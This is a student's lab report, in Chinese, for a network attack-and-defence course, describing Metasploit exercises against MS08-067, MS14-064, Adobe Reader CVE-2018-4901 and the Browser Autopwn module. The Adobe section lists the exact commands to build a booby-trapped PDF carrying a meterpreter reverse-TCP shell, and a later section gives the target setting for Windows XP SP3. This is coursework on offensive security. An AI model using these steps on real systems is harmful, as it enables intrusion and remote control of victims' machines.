20202428 2021-2022-2 《网络与系统攻防技术》实验六实验报告

白鹤大人泰库拉 2023-05-24 17:31:50

1. 实验内容
1.1 实验要求
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,尽量使用最新的类似漏洞;

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

1.4 成功应用任何一个辅助模块。

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的。

2. 实验过程
2.1 一个主动攻击实践,尽量使用最新的类似漏洞
MS08-067
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

 

 

 

 

2.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞

MS14-064

 

2.3 针对客户端的攻击:CVE-2018-4901

Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。所以我利用这个漏洞。

2.3.1 查找漏洞存在

查一下Adobe,发现存在。

 

 

 

2.3.2 开始攻击

进入 Kali Linux,使用 Metasploit 生成 PDF 木马文件。
1.搜索 Adobe 渗透模块

search adobe_cooltype_sing 

2.调用渗透模块

use exploit/windows/fileformat/adobe_cooltype_sing/ 

3.查看模块详情

 info 

4.调用meterpreter载荷,反向连接到渗透机

 set payload windows/meterpreter/reverse_tcp 

5.设置Kali Linux的IP地址

set LHOST 攻击机ip地址

6.设置本地监听端口

 set LPORT 端口

7.设置带有后门程序的PDF文件

set FILENAME 起个名字.pdf

8.执行渗透生成文件

exploit

2.4 成功应用任何一个辅助模块
Browser Autopwn
Browser Autopwn 是由Metasploit提供的一个辅助模块。当访问一个Web页面时,它允许用户自动地攻击一个入侵主机。Browser Autopwn在攻击之前,会先进行指纹信息操作,这意味着它不会攻击Mozilla Firefox浏览器,而只会攻击系统自带的Internet Explorer7浏览器。

 

3. 问题及解决方案
任务1里面Exploit completed,but no session was created报错,是因为没有设置target,Metaexploit会使用默认的Exploit Target 0,我的靶机系统是Windows XP SP3,需要设置target为34,就ok了

4.学习感悟、思考等
在这次实验中,我学习了metasploit的基本应用方式,重点掌握了三种攻击方式的思路。在完成任务的过程中,我遇到了很多困难和挑战。尤其是在针对浏览器和客户端的攻击中,由于漏洞的不断更新和修复,我需要不断地寻找最新的漏洞并进行尝试。我还学习了如何使用辅助模块,这些模块可以帮助我更加高效地进行攻击和渗透测试。总的来说,这次计算机实验让我受益匪浅。通过实践,我不仅掌握了metasploit的基本应用方式,还深入了解了网络安全的重要性和攻击的原理。我相信,在今后的学习和工作中,这些知识和经验都会对我有很大的帮助。
 

...全文
27 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复

89

社区成员

发帖
与我相关
我的任务
社区描述
网络与系统攻防技术课程作业
网络安全系统安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧